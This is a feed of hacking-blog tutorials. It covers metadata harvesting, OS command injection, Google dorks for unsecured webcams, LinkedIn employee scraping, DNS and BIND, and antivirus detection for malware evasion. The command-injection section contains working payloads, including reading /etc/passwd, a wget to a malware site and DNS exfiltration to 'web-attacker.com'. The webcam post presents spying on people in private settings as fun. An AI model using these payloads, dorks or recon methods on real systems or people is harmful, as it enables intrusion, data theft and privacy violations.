Loading...

Follow Hackers Arise Blog on Feedspot

Continue with Google
Continue with Facebook
or

Valid
Welcome back, my aspiring cyber warriors!
Sometimes the best information is just there for our asking! Given a little knowledge and some simple tools and techniques, we can harvest information about individuals and organizations that they are not aware they are providing us!
Organizations often post documents on their website usually in a Word .doc (x), Excel .xls (x) or PDF format. These documents include significant amounts of metadata (data about data) that may include;
1. User Names
2. Email addresses
3. Printers
4. Software used to create it
If we can harvest this data, it can be critical to an effective social engineering attack, pentest or forensic investigation.
Earlier, I had showed you how to use the Windows-based tool, FOCA, to gather metadata. In this tutorial, we will be using a Linux command line (cli) tool to do a similar task, named metagoofil. It's always useful to have multiple tools to do similar tasks as the results may vary depending upon many variables.
Step #1: Download and Install metagoofil
Although metagoofil is no longer built into Kali, it is in Kali's repository so you only need to download the package from the Kali repository.
kali > apt-get install metagoofil
Step #2: metagoofil Help
After downloading and installing metagoofil, simply enter the command metagoofil in your terminal and metagoofil will display it's help screen like below.
As you can see, metagoofil has only a few options and the examples near the bottom of the screen display. The key options are;
-d domain to search
-t the type of files to search for
-l limit of the number of files
-n number of files to download
-o output directory to download results to
-f format of the results
Step #3: Using metagoofil to Harvest Metadata at SANS.org
Let's try harvesting some metadata from sans.org, the cybersecurity training organization.
kali > metagoofil -d sans.org -t doc,pdf -l 20 -n 10 -o sans -f html
Where:
-d sans.org is the domain to harvest
-t doc, pdf are the types of files to harvest
-l 20 limit the results to 20 files
-n 10 limitthe downloads to 10
-o sans output to the directory sans
-f html send the results in a html format
As metagoofil completes its harvesting of metadata it begin the display in the terminal. As you can see below, it was able to recover 6 user names, a list of software used to create the documents and 11 email addresses.
We can also view the results from a browser as we defined the output type as html. Open your browser and navigate to /root/html.
As you can see below, metagoofil has created an easy to read html document with all the metadata it was able to harvest from documents on the website sans.org
The information we were able to easily harvest from this site can be used to;
1. Design a social engineering attack against the email addresses;
2. Exploit the software we now know is on some systems;
3. Find individuals we have been searching for.
Conclusion
Some simple techniques and tools can effectively harvest open source intelligence from the vast repository of data on the Internet. metagoofil is an effective tool for extracting metadata from documents that are on a organizations website, if the metadata has not been effectively stripped out. This metadata can be used for multiple purposes including pentesting, forensic investigation and social engineering.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my aspiring cyber warriors!
In this tutorial on Web App Hacking, we'll examine Operating System command injection. This web site vulnerability enables the attacker to inject and execute operating system commands into the underlying server and often fully compromise the server and all its data. If the attacker can inject OS commands on the server they can then compromise other elements of the network within the organization.
This usually happens when the application provides some functionality for the user that involves system commands. If the application does not properly sanititize inputs, the attacker may be able send malicious commands to the operating system that could even include opening a shell or downloading malicious software.
Let's use the DVWA application on Metasploitable 2 to demonstrate this attack.
Step #1 Fire Up Kali
Step #2 Metasploitable with DVWA
Open you browser on Kali and navigate to the IP address of the Metasploitable system or then dvwa such as http://192.168.0.157/dvwa. This will retriev the login screen on DVWA. The login is admin and password.
Next, go to the "DVWA Security" tab on the lower left and click. This opens the DVWA Security page. Set the security to "Low". Now, click on the "Comand Execution" tab in the upper left of the scrren. You should see a screen similar to that below.
Notice that this application allows you to send a ping. Go ahead and enter an IP address and click Submit and you should see the response in red below.
It's clear that this application is taking your IP address and concatenating to the command ping and send out an ICMP Echo request.
It may be possible to run more than one command in this window. In most operating systems, commands can be terminated with a semi-colon. If we place a semi-colon after the IP address, we may then add another command and get both to excecute. Let's try the Linux command whoami
192.168.0.1; whoami
As we can above, the ping command executed and then the whoami executed revealing that the user is "www-data".
Since we are not root, we can not retrieve the /etc/shadow file, but we may be abl eto retrieve the /etc/passwd file. We could add the command cat /etc/passwd after the IP and if it executes, we should be able to retrieve this file that contains all the usernames and accounts.
Success! Although we don't have their passwords, we do have all the accounts on the system
Operators
We can concatenate commands this way with other operators as wella s the semi-colon. Here are a few;
; The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon.
& It separates multiple commands on one command line. It runs the first command then the second command.
&& It runs the command following && only if the preceding command is successful
|| (windows) It runs the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.
|| ( Linux) Redirects standard outputs of the first command to standard input of the second command
The following command separators work only on Unix-based systems:
;Newline (0x0a or \n)
For instance, we could use the double ampersand (&&) to run the ping command and then the netstat command. If the first command runs successfully, then the second command will run. If the firts command fails, the second command will not execute
192.168.0.1 && netstat
Blind OS Command Injection
It may be that the results of your command do not generate a HTTP response and are not displayed in your browser. This would be more common than not. We can still try to inject and OS command, but not see the results in our brwoser. This is refererred to as Blind OS Command injection.
For instance, in our last OS command injection example, we ran netstat and the results were displayed in our brwser. If the results are not displayed in the browser we may be able to redirect the output to a file and then display that file. For instance, we might enter;
192.168.0.1 && netstat > netstat.txt
This would direct the output from the netstat command to be directed to a file named netstat.txt and save it in the currect directory on the server. We might be abl eto display those contents then by directing our browser to that directory and file such as;
192.168.0.157/dvwa/vulnerabilities/exec/netstat.txt
In addition, we may be able to use an out of band technique to determine that the command exceuted. For instance, we could finish the string of commands with nslookup of a site and check to see whether the lookup was executed on the name server. This would verify that all the commands executed.
Finally, it may be possible to direct the server to a site containing malicious software
192.168.0.1 %% wget https://malwaresite.com
Executing arbitrary commands
Consider a shopping application that lets the user view whether an item is in stock in a particular store. This information is accessed via a URL like:
https://insecure-website.com/stockStatus?productID=381&storeID=29
To provide the stock information, the application must query various legacy systems. For historical reasons, the functionality is implemented by calling out to a shell command with the product and store IDs as arguments:
stockreport.pl 381 29
This command outputs the stock status for the specified item, which is returned to the user.
Since the application implements no defenses against OS command injection, an attacker can submit the following input to execute an arbitrary command:
& echo aiwefwlguh &
If this input is submitted in the productID parameter, then the command executed by the application is:
stockreport.pl & echo aiwefwlguh & 29
The echo command simply causes the supplied string to be echoed in the output, and is a useful way to test for some types of OS command injection. The & character is a shell command separator, and so what gets executed is actually three separate commands one after another. As a result, the output returned to the user is:
Error - productID was not provided aiwefwlguh 29: command not found
The three lines of output demonstrate that:
The original stockreport.pl command was executed without its expected arguments, and so returned an error message.The injected echo command was executed, and the supplied string was echoed in the output.The original argument 29 was executed as a command, which caused an error.
Placing the additional command separator & after the injected command is generally useful because it separates the injected command from whatever follows the injection point. This reduces the likelihood that what follows will prevent the injected command from executing.
LABOS command injection, simple case
Useful commands
When you have identified an OS command injection vulnerability, it is generally useful to execute some initial commands to obtain information about the system that you have compromised. Below is a summary of some commands that are useful on Linux and Windows platforms:
Purpose of commandLinuxWindows
Name of current userwhoamiwhoami
Operating systemuname -aver
Network configurationifconfigipconfig /all
Network connectionsnetstat -annetstat -an
Running processesps -eftasklist
Blind OS command injection vulnerabilities
Many instances of OS command injection are blind vulnerabilities. This means that the application does not return the output from the command within its HTTP response. Blind vulnerabilities can still be exploited, but different techniques are required.
Consider a web site that lets users submit feedback about the site. The user enters their email address and feedback message. The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details. For example:
mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com
The output from the mail command (if any) is not returned in the application's responses, and so using the echopayload would not be effective. In this situation, you can use a variety of other techniques to detect and exploit a vulnerability.
Detecting blind OS command injection using time delays
You can use an injected command that will trigger a time delay, allowing you to confirm that the command was executed based on the time that the application takes to respond. The ping command is an effective way to do this, as it lets you specify the number of ICMP packets to send, and therefore the time taken for the command to run:
& ping -c 10 127.0.0.1 &
This command will cause the application to ping its loopback network adapter for 10 seconds.
LABBlind OS command injection with time delays
Exploiting blind OS command injection by redirecting output
You can redirect the output from the injected command into a file within the web root that you can then retrieve using your browser. For example, if the application serves static resources from the filesystem location /var/www/static, then you can submit the following input:
& whoami > /var/www/static/whoami.txt &
The > character sends the output from the whoami command to the specified file. You can then use your browser to fetch https://vulnerable-website.com/whoami.txt to retrieve the file, and view the output from the injected command.
LABBlind OS command injection with output redirection
Exploiting blind OS command injection using out-of-band (OAST) techniques
You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques. For example:
& nslookup kgji2ohoyw.web-attacker.com &
This payload uses the nslookup command to cause a DNS lookup for the specified domain. The attacker can monitor for the specified lookup occurring, and thereby detect that the command was successfully injected.
LABBlind OS command injection with out-of-band interaction
The out-of-band channel also provides an easy way to exfiltrate the output from injected commands:
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
This will cause a DNS lookup to the attacker's domain containing the result of the whoami command:
wwwuser.kgji2ohoyw.web-attacker.com
LABBlind OS command injection with out-of-band data exfiltration
Ways of injecting OS commands
A variety of shell metacharacters can be used to perform OS command injection attacks.
A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:
&&&|||
The following command separators work only on Unix-based systems:
;Newline (0x0a or \n)
On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:
` injected command `$( injected command )
Note that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.
Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my aspiring OSINT cyber warriors!
The Internet is the largest and deepest repository of data in the history of the world. With that tautology out of the way, let's get down to work, and maybe, a little fun.
All the data on the Internet can be very valuable to an investigator or hacker, but here we are going to have a little fun. Nearly every web cam is connected to the Internet and with just a little knowledge we can find and operate them.
In any earlier post here, I taught you a little about Google hacking. The table below details some of the most important keywords used in creating Google dorks, as they are known.
We can use these techniques to find unsecured web cams.
Although this is mostly fun, once while doing a pentest at a major university, I found their server room webcam unsecured. As a result, I could zoom in and see all their server and network hardware as well as observe the times the server room was unattended. This was invaluable information in developing a strategy for compromising their network!
Google Dorks for Web Cams
There are literally hundreds of different Google dorks for finding web cams, but these are some of the most effective and my favorites.
Let's try a few and see what we can find!
Hmmm...a restaurant patio somewhere on this planet with PTZ controls.
An intersection...you'll find plenty of these among the unsecured web cams.
The classic pendulum at Dusseldorf University in Germany.
It was night when I connected to this rooftop cam somewhere in Delft.
A pretty scene somewhere in Sweden, I believe.
Watching a family load and launch their boat near the Algonquin Hotel complete with PTZ controls. Be safe!
I wonder if this person knows that their every move is being watched by people all over the world?
A bar in Barcelona Spain. Might be fun watching the drunks stumble out at closing.
A woman on your computer in her living room in Seattle.
Summary
Open Source Intelligence (OSINT) can be a valuable tool for the pentester or the forensic investigator betraying a cornucopia of data on the target. It can also be used for fun and voyeurism for those so inclined.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my aspiring cyber warriors!
The Internet is the deepest and widest data repository in the history of the world! Those who can extract and cultivate intelligence from it, will be empowered like none other!
This data can be used for offensive security and forensic investigations, among many other applications.
Crosslinked is one more tool for automating the gathering of this data from the huge repository. Crosslinked is Python script for extracting company employee names from LinkedIn. Of course, we could do this manually, but this tool will save us many tens of hours of tedious work.
Step #1: Fire Up Kali
The first step, of course, is to fire up our trusty Kali and open a terminal.
Step #2: Download and install crosslinked.py
Crosslinked is not built into Kali, nor is it in our Kali repository but we can find it on github.com. Simply clone it from m8r0wn's repository.
kali > git clone https://github.com/m8r0wn/crosslinked
Next, we need to download and install crosslinked's requirements. There should be a file named requirements.txt in our new crosslinked directory.
kali > cd crosslinked
kali > pip3 install -r requirements.txt
Step #3: Crosslinked Help
Before we begin working with crosslinked, let's look at its cursory help file.
kali > crosslinked -h
In it's simplest form, the crosslinked syntax looks like this;
crosslinked.py <name format> <company>
It's also important to note that you must give yourself permission to run the script.
kali > chmod 755 crosslinked.py
Step #4: Extracting Tesla Employees from LinkedIn
Now that we have everything setup with crosslinked script, let's see whether we can find employees of Tesla, Elon Musk's electric car company. To do so, we need to specify the name format and the company name.
kali > ./crosslinked.py -f '{first}.{last}'@tesla.com' tesla
Where:
crosslinked.py is the command
-f format option of the names
'{first}.{last}@company.com' the name format to use
tesla the company we are searching
When the script has completed its run, crosslinked should place a file in the default directory named names.txt. We can find it by simply doing a long listing.
To see the contents of this file, simply use the command more before the file name. As we can see above, crosslinked was able to extract the names of hundreds of people who work at Elon Musk's Tesla.
kali > more names.txt
Step #6 Extract the People Working at Breitbart News
Let's see if we can do the same task against another company. Let's find the employees of Breitbart News, the hate-mongering, conspiracy promoting, racist and mysogynist online magazine.
We already have the Tesla employees in the names.txt file, so unless we want to append the Breitbart employees to that file, we will need to direct crosslinked to create a new file. We can do that using the -o switch (see the help screen above).
kali > ./crosslinked.py -f '{first}.{last}@breitbart' breitbart -o breitbart.txt
Now, crosslinked goes out and extracts the Breitbart employee names from LinkedIn. When we do a long listing on our default directory, we find the file breitbart.txt that we directed crosslinked to create in the command above.
kali > ls -l
We can see the contents of that file by prefacing the file name with "more".
kali > more breitbart.txt
As you can see, crosslinked was capable ofextracting hundreds of employees names from LinkedIn that work at Breitbart News. These are the people you can thank for defiling the public discourse with hate-filled, racist, xenophobic, and mysogynist misinformation.
Summary
The Internet harbors a vast wealth of information just waiting to untethered. Crosslinked helps us automate the process of extracting employee names for particular companies from LinkedIn, which may be crucial in a digital forensic investigation or penetration testing environment.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my aspiring cyber warriors!
The Domain Name System or DNS is one of those network protocols that makes the world go round. Without it, we would need to remember innumerable IP addresses just to navigate to our favorite web sites. Imagine trying to remember the IPv4 (32-bit) addresses of Facebook, Amazon and Hackers-Arise, just to visit each of those critically important web sites (only made worse by IPv6 128-bit addresses).
DNS was designed to translate a domain name--something people are rather good at remembering--into an IP address, the language of Internet Routing. Think of DNS as simply a translation of a domain name to their respective IP addresses. So, when you enter a domain such as www.hackers-arise.com into your browser, it is translated into a computer-friendly IP address (23.236.62.147 ) that the Internet can understand and route.
In this tutorial on DNS, we examine;
I. How Domain Names work
II. How DNS works,
III. A Packet-level Analysis of DNS requests and responses,
IV. Vulnerabilities and security in DNS,
V. Build your own DNS server in Linux.
I. Domain Names
Domain names must be registered with ICANN (Internet Corporation for Assigned Names and Numbers) usually through an intermediary such as VeriSign or GoDaddy. Top Level Domains or TLD's include .com, .edu, .org and many others that we typically seen at the end of Full Qualified Domain Name (FQDN).
DNS works in a hierarchical manner. The Top Level Domains or TLD's can have multiple sub domains under them. In the diagram above, both .redhat and .cnn are part of the Top Level Domain .com. A sub domain is a domain that is part of larger domain. In this example, redhat and cnn are often just referred to as the domain in common parlance, but are actually the Second Level Domain or (SLD) under .com.
Then, beneath these SLD's or commonly referred to domains, we many subdomains. For instance, within and beneath .redhat, we might have sales.redhat, engineering.radhat, development.redhat. This is a method of subdividing the domain. The left most portion is always the most specific, while the right most is most general.
a. Fully Qualified Domain Name
A fully qualified domain or FQDN is what many people refer to as absolute domain name. A Full Qualified Domain Name (FQDN) specifies its location from the absolute root of the DNS system.
Now that we have a basic understand of domain names, the next issue in understanding how DNS is how do we translate domain names to IP addresses. Initially, clients used a simple hosts file on each client.
b.Host Files
When the Internet was very, very small (in a universe far, far away...), the association of domain names with IP addresses could fit into single text file (ARPANET, the predecessor and prototype of the internet had just 4 sites) . This single text file was then and now referred to as a hosts file. As the Internet grew larger, this hosts file proved inadequate. It was neither large enough and nor could it be constantly updated as new domains were registered and old ones left or changed. Despite this, your system still probably still a has a hosts file.
On your Kali Linux system, your hosts file is located in the /etc directory as seen below. You can open it by entering;
kali> leafpad /etc/hosts
Note that each IP address is on the same line as the associated host, in this case localhost or Kali. Whenever you enter localhost in your browser, it translates it to your "home" IP or 127.0.0.1.
On the fourth line of my hosts file here, you will see an association of the private IP address 192.168.1.114 to the domain bankofamerica.com With this hosts file in place, whenever I enter www.bankofamerica.com in my browser, I would be directed to the IP address 192.168.1.114, rather than the actual IP address of Bank of America at 171.159.228.150.
I can test this also by pinging bankofamerica.com.
As you can see above, when I then try to ping www.bankofamerica.com, my ping is directed to the address associated with bankofamerica in my hosts file. The hosts file takes precedence over DNS queries. This can be a key bit of information when attempting to do DNS spoofing on a LAN (see below).
This is how DNS was operated when the Internet was very, very small.
II. How DNS Works
Now that the Internet contains billions of IP addresses and FQDN, the host file is woefully inadequate. Enter DNS. First developed by Paul Mockapetris (now in the Internet Hall of Fame) in 1983, DNS is both distributed and dynamic, unlike our hosts file.
DNS does not rely upon one file or one server, but instead upon many files across many server across the globe. These servers are organized in a hierarchical manner. Due to this distributed nature, the DNS system is resistant to outages of one or many of these servers.
As we can see in the diagram above, the user asks (queries) the local DNS server to access download.beta.example.com. The local DNS server does not have that resource as it is new. It then queries the root server. The root server responds "I don't know" but refers the local DNS server to the IP address of the authoritative server for the top-level domain (TLD), in this case .com. The local DNS server will then query the TLD server for .com and it will respond with the authoritative server for the domain, in this case example.com. The local DNS server will then query the authoritative server for beta.example.com. If it has the record, it will return the resource (IP address) and if not, it will respond it "doesn't know".
a. DNS Components
The DNS service has four (4) components;
1. DNS Cache
2. Resolvers,
3. Name servers,
3. Name space.
1. DNS Cache
This term is often confused as it has at least two meanings. First, DNS cache can be the list of names and IP addresses that you have already queried and have been resolved and are cached for you so that no network traffic is generated to resolve them (and much quicker). The second meaning regards a DNS server that simply performs recursive queries and caching without actually being an authoritative server itself.
2. Resolvers
Resolvers are any hosts on the Internet that need to look up domain information, such as the computer you are using to read this website.
3. Name Servers
These are servers that contain the database of names and IP addresses and serves DNS requests for clients.
4. Name Space
Name space is the database of IP addresses and their associated names.
b. Zone Files and Records
Every DNS zone has a zone file. This zone file may be thought of as DNS database.
These zone files have one or more resource records. These DNS records must be periodically be updated as new domains are added, changed and others dropped. Without this process, the system would remain stagnant and eventually be completely out of date. Therefore, it is essential that DNS server be capable of zone transfers.
1. Resource Records
Resource Record is a single record that describes just one piece of information in the DNS database. These records are simple text lines such as;
Owner TTL Class Type RDATA
Each of these field must be separated by at least one space.
2. Common Resource Record Types
SOA Records
The Start of Authority, or SOA, record is a mandatory record in all zone files. It must be the first real record in a file (although $ORIGIN or $TTL specifications may appear above). It is also one of the most complex to understand. The fields includes the primary name server, the email of the administrator, the domain number and timers for refreshing the zone.
NS Records
NS or name server identifies the authoritative DNS server for the zone.
A Records
The A (Address) record is used to map a domain or subdomain to an IPv4 address. For instance, hackers-arise.com points to 23.236.62147.
AAAA records point to an IPv6 record.
:
CNAME (Canonical) records
The CName or canonical name maps one domain or subdomain to another domain name.
PTR records
PTR Records are used in reverse DNS records (i.e. from IP address to hostname). PTR or Pointer points to a canonical name and just the name is returned in the query. You might think of these as the reverse of A or AAAA records.
MX Records
The MX record directs mail to a specific a mail server responsible for accepting of mail in the zone. Like CNAME, the MX record must always point to a domain and never an IP address.
III. Packet Level Analysis of DNS Queries
The DNS protocol, like other communication protocols our networks use, has a standard packet structure. It's fairly simple and you can view it below without going into great detail here.
If we capture DNS queries with Wireshark, we should see something like the capture below. Notice that a DNS query is sent from the client and the DNS response comes from the DNS server.
It's also important to note that these queries use UDP and not TCP (zone transfers use TCP).
If we expand the DNS packets, we can see that they come in two varieties, Standard Query as seen below...
...and a Standard Query Response as seen here.
IV. DNS Security and Vulnerabilities
The Domain Name Service was once very fragile and vulnerable to attack. Over the years the system has been hardened and attacks are more infrequent, but still occur. In some cases, the hackers/attackers can simply harvest information from the DNS servers on the target such as DNS scanning and DNS recon (see Abusing DNS for Reconnaissance).
On local area networks (LAN) it may be possible to spoof DNS with tools such as dnsspoof to send client traffic to a local system of hacker's choice. For instance, the attacker could send all the banking traffic to their malicious site and harvest credential there.
A. DNS Vulnerabilities
Although among the most malicious attacks on DNS would be changing your DNS server (A Record) and changing where your client is taken when requesting a website, these are increasingly rare, but not unheard of. (see Iranian DNS attacks below). Increasingly, successful attacks against DNS are Denial of Service (DOS) attacks.
While on most systems and protocols, DoS attacks are an inconvenience, with such an essential service as DNS, a DoS attack can be crushing. Imagine if your business' or ISP's DNS server went down. Although the Internet would still be functioning (you could ping any IP address), you would not be able to connect to any sites without entering their full IP address (or change your DNS server).
If we view the list of BIND (a Linux implementation of DNS) vulnerabilities in the CVE database, we can see the vast majority of the vulnerabilities in recent years are DoS attacks.
Among the most malicious DNS attacks would be the zone transfer. A zone is the data that maps IP addresses to domains. If an attacker can change that information on a DNS server, even Internet traffic would be re-directed to their website causing all types of mischief.
B. Changing DNS Server Settings
Another type attack against the DNS system would be to simply change the setting that directs the DNS queries to another malicious DNS server. In a way, this really isn't technically an attack against DNS, but rather an attack against internal credentials and servers, such as the mail server. You can read below the details of an attack U.S. CERT warned against in early 2019 where credentials of the sysadmin (or other user with authority to change DNS records) and redirect users DNS queries to their malicious DNS Server.
Recently a group of Iranian hackers were able to attack the DNS of multiple companies in order to harvest credentials. They did this in at least 3 different ways;
1. Attackers change DNS records for victim's mail server to redirect it to their own email server. Attackers also use Let's Encrypt certificates to support HTTPS traffic, and a load balancer to redirect victims back to the real email server after they've collected login credentials from victims on their shadow server
2.Same as the first, but the difference is where the company's legitimate DNS records are being modified. In the first technique, attackers changed DNS A records via an account at a managed DNS provider, while in this technique attackers changed DNS NS records via a TLD (domain name) provider account
3. Sometimes also deployed as part of the first two techniques. This relies on deploying an "attacker operations box" that responds to DNS requests for the hijacked DNS record. If the DNS request (for a company's mail server) comes from inside the company, the user is redirected to the malicious server operated by attackers, but if the request comes from outside the company, the request is directed to the real email server.
C. DNS Security or DNSSec
DNS by default is NOT secure. DNS can be easily spoofed due to the fact that DNS is based on UDP, which is not connection-oriented. DNSSEC or DNS Security Extensions was developed to strengthen the authentication in DNS by using digital signatures.
Every DNS zone has a public/private key. Any recursive resolver that looks up data in the zone, also retrieves the zone's public key which can used to validate the authenticity of the data.
Before DNSSec, it was possible for malicious actors to execute zone transfers on DNS servers. This would poison the data making it unreliable. DNSSEC prevents this by;
1. Cryptographically verifying that the data it receives actually comes from the zone it believes it should come from;
2. Insuring the integrity of the data so that the data can't be altered enroute as the data must be digitally signed by the private key of the zone.
V. Implementing DNS (BIND) in Linux
Now that we understand the basics of how DNS works and how attackers might use DNS in their attacks, let's set up a DNS server in our Linux system. BIND or Berkeley Internet Domain System is commonly used on Linux systems, is the most widely used DNS server on the Internet and is among the best DNS systems.
Although setting up and configuring a BIND server is profession in itself, here we will attempt to set a simple, basic BIND server on our local area network (LAN) to help you understand the functioning of these servers.
1. First, let's download and install bind9 from the repository.
kali > apt-get install bind9
If bind9 is not in your repository, you can get it directly from ISC.org reposority using git clone.
kali > git clone https://gitlab.isc.org/isc-projects/bind9.git
2. Next, let's open the configuration file for BIND at /etc/bind/named.conf.options (all configuration files for BIND are located at /etc/bind).
kali > leafpad /etc/bind/named.conf.options
As you can see, we edited the highlighted paragraph to;
listen on port 53 from localhost and our local area network on 192.168.1.0/24;
allow-query on localhost and 192.168.1.0/24
use forwarder at 75.75.75.75 (where to forward DNS requests when your DNS server can't resolve the query)
and enable recursion.
3. Next, let's open named.conf.local. This is where we define the zones files for our domain.
Note that we defined the locations of our forward and reverse lookup zone files. Now, we need to create these forward and reverse zone files.
Let's navigate to the /etc/bind directory. There you will see a file named db.local. This is a template for our fowarder file. Let's copy it to a file named forward.hackers-arise.local.
kali > cp db.local forward.hackers-arise.local
kali > leafpad /etc/bind/forward.hackers-arise.local
Let's open this file in leafpad and make a few changes by specifying our domain (hackers-arise.com), the IP address of our DNS server (192.168.1.27), our mail server and finally the IP addresses of the web server and email server.
Now, we need to create a reverse lookup file. Once again, we have a template in the /etc/bind directory. In this case, it's named db.127. Let's copy it to reverse.hackers-arise.local.
kali > cp db.127 reverse.hackers-arise.local
Then, let's open that file with leafpad.
kali > leafpad /etc.bind/reverse.hackers-arise.local
Let's now make a few changes.
Under "Your Name Server" add;
primary.your domain.local.
The IP address of the name server
Under "Reverse Lookup" add;
the last octet of the IP address of the NS and primary.your domain.local.
Under "PTR Records" add;
the last octet of the webserver and www.your domain.local
the last octet of the mail server and mail.your domain.local.
4. In our final step, we just need to restart the service for our changes to be captured and implemented.
kali > service bind9 restart
For those of you prefer the new systemd commands, this works just as well.
kali > systemctl restart bind9
Now, our BIND server is ready to resolve DNS queries on our local area network!
Summary
DNS is among the most essential communication protocols for smooth functioning of your internet access translating human readable domain names to router readable IP addresses. There have been number of security threats to DNS including stealing DNS admin credentials and changing zone files and Denial of Service (DoS) attacks.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my greenhorn hackers!
In previous tutorials, we have looked at ways to re-encode your payloads and other malware to evade AV software. We have also looked at the inner workings of Clam AV to better understand how this type of software works. Sometimes, we can encode our malware with applications such as Shellter and Veil-Evasion and it will successfully evade one type of AV software and not another.
In our efforts to evade AV, it may not be possible to evade all AV software. On the other hand, we may not need to evade ALL AV software, just the AV software that the target is using. If we could decipher what AV they are using, we could make certain that our malware is undetectable by that AV. That's all we need.
In an earlier tutorial, I introduced you to recon-ng. Recon-ng is a powerful modular reconnaissance framework. One of the modules enables us to detect what AV software the target is using. It relies upon sending non-recursive DNS queries to the corporate DNS server to determine whether that DNS server has a cache that includes that AV manufacturer's website. If it does, that means that someone within the organization is using that AV software (someone is the organization has had to go to the website to update signatures) If it doesn't, it means that no one has queried for that AV manufacturers site and is likely not using that software.
1. Fire Up Kali and Start Recon-Ng
Let's start my firing up Kali and starting recon-ng by typing in a terminal;
kali >recon-ng
When recon-ng starts, you will be greeted with a welcome screen like that above.
2. Show Modules
Remember, recon-ng works very similarly to Metasploit. The commands in some cases are identical and if not, very close. Like Metasploit, we can see all the modules by typing;
recon-ng > show modules
As you can see, the first group of modules displayed are the discovery modules and the first discovery module is "cache snoop". That is the module we want to use here.
3. Use
To use the cache snoop module the syntax is identical to Metasploit. Simply type;
recon-ng > use discovery/info_disclosure/cache_snoop
Once this module is loaded, type;
recon-ng >show info
In this info screen, we can see the basics of this module. It's really quite simple. It requires two inputs; (1) a file containing the AV software domains, and (2) the IP address of the NAMESERVER we are snooping on.
Recon-ng includes a default list of AV softwarre domains. It is a simple text file at;
/usr/share/recon-ng/data/avdomains
We can view its contents by simply opening it in a text editor or using one of the many commands in Linux that displays the contents of a file such as cat, less and more. Here, I have displayed its contents using more.
As you can see, it contains the domains of many of the major AV software companies, but not all. If you want to add a domain, simply open this file in a text editor, add the domain and save the file. Voila! You are done.
4. Getting the Nameservers
To get the nameserver of the domain you are targeting, simply use the dig command in Linux. The syntax is simple, simply dig <domainname> ns where ns indicates that you want the nameserver. Let's try it for , www.wonderhowto.com.
kali > dig wonderhowto.com ns
As you can see in the screenshot above, this command displays the nameservers for wonderhowto.com. Let's try the same for a major information security training company, www.infosecinstitute.com.
kali > dig infosecinstitute.com ns
As you can see, we found the nameservers for www.infosecinstitute.com. Let's write down all these nameservers for use in recon-ng.
5. Set NAMESERVER and Run
Let's start by using infosecinstitute's nameserver and see whether the DNS server has any evidence of anyone in this organization using these AV software
recon-ng > set NAMESERVER 216.92.3.91
recon-ng > run
As you can see, recon-ng found each of these AV software developers products had been used by someone within that organization. Not surprising that an information security firm would have tried all the software manufacturers.
Let's try the same with wonderhowto.com.
recon-ng > set NAMESERVER 208.78.70.29
recon-ng > run
We can see that the nameserver for wonderhowto.com does not have ANY entries for the AV software on our list. This doesn't mean that wonderhowto.com is not using any AV software, but simply that it is using AV software not on the list included in recon-ng. That means that malware detected by one of these developers on our list may not be detected by the target.
Conclusion
What can we conclude from these results? Let's begin by saying that this module is not perfect, but it can useful. In the case of www.infosecinstitute.com, we can conclude that someone recently has used or updated each other AV software on our list. As for wonderhowto.com, we can conclude that no one within that organization using that nameserver has used or updated AV software on that list. That could make them vulnerable.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my aspiring cyber warriors!
The Internet is the largest data repository the world has ever known! Open Source Intelligence or OSINT is the way to gather and unlock the intelligence embedded in all that data.
In recent years, a brand new reconnaissance framework has become available to us that leverages many of the tools we are already using, but makes them far more powerful. Rather than manually searching for the data from innumerable data sets, recon-ng enables you to automate your data searches saving you time and energy.
recon-ng, was developed by Tim Tomes while at Black Hills Information Security. He developed it as a Python script and tried to model its usage after Metasploit, making it easy for a pentester with Metasploit skills to use recon-ng with a very short learning curve
It is built into Kali, so there's no need to download or install anything.
Let's explore its many and powerful capabilities a bit here.
Step #1: Fire Up Kali and Open a Terminal
The first step, of course, is to fire up Kali and open a terminal like below.
Step #2: Start recon-ng
To start recon-ng, we simply need to enter the command "recon-ng" at the command line.
kali > recon-ng
When recon-ng starts you will be greeted by it's splash screen and a menu of the types of modules and their number. These modules include;
1. Recon Modules
2. Reporting Modules
3. Import Modules
4. Exploitation Modules
5. Discovery Modules
Next, let's find out what commands we can use in recon-ng by entering help at the recon-ng prompt.
[recon][default] > help
If you have used Metasploit, you can see many of the same commands such as use, set, show, search, etc.
To see all the modules in recon-ng, we can simply enter "show modules".
[recon][default] > show modules
Step #3: API (Application Programming Interface) Keys
recon-ng is capable of using a number of online resources such as Facebook, Twitter, Instagram, Google, Bing, LinkedIn and others. To use these resources, you simply need to obtain an API key and enter it. For a list of API keys that recon-ng can use, enter "keys list".
[recon][default] > keys list
So, once we obtained our Facebook API key, we simply need to add that key to use Facebook for reconnaissance.
[recon][default] > keys add facebook_api 123456
[recon][default] > keys list
Now, you are ready to use Facebook's API to connect to Facebook and do your recon searches there.
Step #5: Profiler
recon-ng has numerous modules for finding information available on the web. Let's take a look at just one module here, profiler (we'll examine others in future tutorials).
Let's assume that you are looking for a person who uses the profile name "Occupytheweb" and want to find out whether they use that same profile on other sites. recon-ng has a module for that!
It's called the 'profiler' and we can find it at recon/profiles-profiles/profiler. To use this module, simply enter;
[recon][default] > use recon/profiles-profiles/profiler
To learn more about this module, then enter;
[recon][default] > info
